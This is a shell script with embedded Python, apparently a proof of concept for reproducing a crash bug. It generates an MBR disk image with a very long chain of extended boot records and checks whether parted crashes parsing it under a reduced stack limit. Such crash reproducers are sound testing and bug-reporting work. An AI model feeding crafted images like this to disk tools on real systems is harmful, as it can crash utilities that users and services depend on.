#!/bin/sh
#
# Proof of concept: does parted crash on a very long chain of MBR extended
# boot records (EBRs)?  The script builds a raw disk image whose MBR holds a
# single extended partition followed by DEPTH chained EBRs, runs
# `parted -s IMAGE unit s print` under a reduced stack limit, and reports
# whether parted crashed.
#
# Environment:
#   PARTED_BIN     parted binary to test (default: `parted` found on PATH)
#   DEPTH          number of chained EBRs to generate (default 20000, min 2)
#   STACK_KB       value passed to `ulimit -s` before running parted
#                  (default 1024)
#   TIMEOUT_S      duration handed to `timeout` when it is available
#                  (default 45)
#   IMAGE_PATH     where the image is written
#                  (default ./parted-mbr-ebr-crash.img)
#   KEEP_IMAGE     1 = keep an image that was created in the temp directory
#                  (default 1); an image at IMAGE_PATH is always kept
#   IMAGE_SIZE_MB  force the image size in MiB; rejected if too small for
#                  DEPTH (default: just large enough for the chain)
#   WITH_LOGICAL   1 = also put one logical partition entry in every EBR
#                  (default 0)
#
# Exit status: 0 if the crash was reproduced, or if the PoC was skipped
# because no parted binary was found; non-zero otherwise.
set -eu

# An explicit PARTED_BIN wins; otherwise fall back to a PATH lookup.
# `command -v` is the POSIX way to resolve a command name; `which` is an
# optional external tool, and when it is missing an installed parted or
# python3 would wrongly be reported as absent.
parted_bin=${PARTED_BIN:-}
if [ -z "$parted_bin" ]; then
	# `|| true`: a failed lookup must not trip `set -e`; it is handled below.
	parted_bin=$(command -v parted 2>/dev/null || true)
fi

# Nothing to test against: treat as a skip, not a failure.
if [ -z "$parted_bin" ]; then
	echo "PoC skipped: set PARTED_BIN to a parted binary."
	exit 0
fi

# python3 generates the disk image, so it is a hard requirement.
if ! command -v python3 >/dev/null 2>&1; then
	echo "PoC requires python3 to create the disk image." >&2
	exit 1
fi

# Tunables, all overridable from the environment.
depth=${DEPTH:-20000}        # number of chained EBRs to generate
stack_kb=${STACK_KB:-1024}   # stack limit for the parted run (ulimit -s)
timeout_s=${TIMEOUT_S:-45}   # duration handed to timeout, when available
sector_size=512
image_path=${IMAGE_PATH:-./parted-mbr-ebr-crash.img}
keep_image=${KEEP_IMAGE:-1}
# The image generator reads IMAGE_SIZE_MB and WITH_LOGICAL directly from the
# inherited environment; these shell copies only record the defaults.
image_size_mb=${IMAGE_SIZE_MB:-}
with_logical=${WITH_LOGICAL:-0}

# Private scratch directory for parted's captured stdout/stderr.
tmp=$(mktemp -d "${TMPDIR:-/tmp}/parted-ebr-poc.XXXXXX")

# With the `:-` default above image_path is never empty, so the temp-dir
# location is only a fallback.
if [ -n "$image_path" ]; then
	img=$image_path
else
	img=$tmp/ebr-chain.img
fi
out=$tmp/parted.out
err=$tmp/parted.err

# Remove scratch files on exit.  The temp directory is deleted as a whole
# unless the image lives inside it and must be kept; in that case only the
# capture files go.  An image outside the temp directory is never touched.
cleanup() {
	case "$img" in
		"$tmp"/*)
			if [ "$keep_image" = "1" ]; then
				rm -f -- "$out" "$err"
			else
				rm -rf -- "${tmp:?}"
			fi
			;;
		*)
			rm -rf -- "${tmp:?}"
			;;
	esac
}

# Clean up once, on EXIT.  The signal traps only turn the signal into an
# exit (128 + signal number), which in turn fires the EXIT trap; without the
# explicit exit the shell would resume the script after the handler returns.
trap cleanup EXIT
trap 'exit 129' HUP
trap 'exit 130' INT
trap 'exit 143' TERM

# Generate the disk image with an inline Python program read from stdin.
# Arguments: image path, EBR chain depth, sector size in bytes.
# IMAGE_SIZE_MB and WITH_LOGICAL are taken from the inherited environment.
python3 - "$img" "$depth" "$sector_size" <<'PY'
import os
import struct
import sys

MIB = 1024 * 1024
TABLE_OFFSET = 446   # byte offset of the partition table inside a sector
ENTRY_SIZE = 16      # bytes per partition table entry
# One table entry: flag byte, 3-byte CHS start, type byte, 3-byte CHS end,
# 32-bit start sector, 32-bit sector count (little-endian).
ENTRY = struct.Struct("<B3sB3sII")

image_file = sys.argv[1]
chain_len = int(sys.argv[2])
sector_bytes = int(sys.argv[3])
forced_size_mb = os.environ.get("IMAGE_SIZE_MB", "")
add_logical = os.environ.get("WITH_LOGICAL", "0") == "1"

if chain_len < 2:
    raise SystemExit("depth must be at least 2")

EBR_SPACING = 2      # sectors from one EBR to the next
FIRST_EBR = 1        # sector of the first EBR; also the extended partition start

# Smallest image that fits the chain, optionally enlarged to a fixed size.
total_sectors = FIRST_EBR + chain_len * EBR_SPACING + 2
if forced_size_mb:
    forced_sectors = int(forced_size_mb) * MIB // sector_bytes
    if forced_sectors < total_sectors:
        min_mib = (total_sectors * sector_bytes + MIB - 1) // MIB
        raise SystemExit(
            f"IMAGE_SIZE_MB={forced_size_mb} is too small for depth={chain_len}; "
            f"need at least {min_mib} MiB"
        )
    total_sectors = forced_sectors


def part_entry(part_type, start, length):
    """Pack one 16-byte partition table entry of the given type."""
    return ENTRY.pack(0, b"\x00\x02\x00", part_type, b"\xff\xff\xff", start, length)


def write_table(f, sector, entries):
    """Write a sector holding `entries` plus the 0x55AA signature."""
    block = bytearray(sector_bytes)
    for slot, entry in enumerate(entries):
        lo = TABLE_OFFSET + slot * ENTRY_SIZE
        block[lo:lo + ENTRY_SIZE] = entry
    block[510:512] = b"\x55\xaa"
    f.seek(sector * sector_bytes)
    f.write(block)


with open(image_file, "wb") as f:
    f.truncate(total_sectors * sector_bytes)

    # MBR: a single extended partition covering everything after sector 0.
    write_table(f, 0, [part_entry(0x05, FIRST_EBR, total_sectors - FIRST_EBR)])

    last = chain_len - 1
    for index in range(chain_len):
        here = FIRST_EBR + index * EBR_SPACING
        records = [part_entry(0x83, 1, 1)] if add_logical else []
        if index != last:
            # Link to the next EBR; the start is relative to the first EBR.
            following = here + EBR_SPACING
            records.append(
                part_entry(0x05, following - FIRST_EBR, total_sectors - following)
            )
        write_table(f, here, records)

logical_count = chain_len if add_logical else 0

print(f"created {image_file}")
print(f"image layout: raw MBR disk image, sector_size={sector_bytes}")
print("mbr: LBA 0 contains one extended partition entry")
if add_logical:
    print("ebr chain: each non-final EBR contains one logical Linux partition and one next-EBR link")
    print("warning: WITH_LOGICAL=1 can hit Parted's 64-partition msdos label cap before stack exhaustion")
else:
    print("ebr chain: each non-final EBR contains only a next-EBR link")
print(f"depth={chain_len} sectors={total_sectors} logical_partitions={logical_count}")
print(f"image_size_bytes={total_sectors * sector_bytes}")
PY

echo
if [ "$keep_image" = "1" ] || [ -n "$image_path" ]; then
	echo "Keeping image artifact: $img"
fi
echo "Running: $parted_bin -s $img unit s print"

# Lower the stack limit for this shell; child processes inherit it.  The
# limit is best-effort, but a failure is reported instead of being hidden:
# a "bug not triggered" verdict means little if the limit was never applied.
if ulimit -s "$stack_kb" 2>/dev/null; then
	echo "Stack limit: ${stack_kb} KiB"
else
	echo "warning: could not set stack limit to ${stack_kb} KiB; parted runs with the current limit" >&2
fi

# Use timeout when it is installed (POSIX `command -v` lookup, not `which`).
# `|| true`: a failed lookup must not trip `set -e`.
timeout_bin=$(command -v timeout 2>/dev/null || true)

# parted is expected to fail or crash, so errexit is suspended while its
# exit status is captured.
set +e
if [ -n "$timeout_bin" ]; then
	"$timeout_bin" "$timeout_s" "$parted_bin" -s "$img" unit s print >"$out" 2>"$err"
	status=$?
else
	"$parted_bin" -s "$img" unit s print >"$out" 2>"$err"
	status=$?
fi
set -e

# Show what parted did: its exit status and, if any, its stderr (indented).
echo "parted exit status: $status"
if [ -s "$err" ]; then
	echo "stderr:"
	sed 's/^/  /' "$err"
fi

# Turn the exit status into a verdict.  The script exits 0 only when the
# crash was reproduced.
case "$status" in
	139|134)
		# 128 + signal number: 139 is SIGSEGV (11) and 134 is SIGABRT (6)
		# with the usual Linux signal numbering.
		echo "BUG TRIGGERED: parted crashed while parsing the long EBR chain."
		exit 0
		;;
	124)
		# 124 is what timeout returns when the time limit expired.
		echo "PoC timed out. This may still indicate excessive recursive parsing; increase TIMEOUT_S or lower STACK_KB."
		exit 1
		;;
	*)
		# Fall back to crash text in stderr.  Alternation needs an extended
		# regular expression (-E); `\|` in a basic one is not portable.
		if grep -Eqi 'segmentation fault|stack overflow' "$err"; then
			echo "BUG TRIGGERED: crash text was reported while parsing the long EBR chain."
			exit 0
		fi
		echo "Bug not triggered at DEPTH=$depth STACK_KB=$stack_kb. Try a larger DEPTH."
		exit 1
		;;
esac
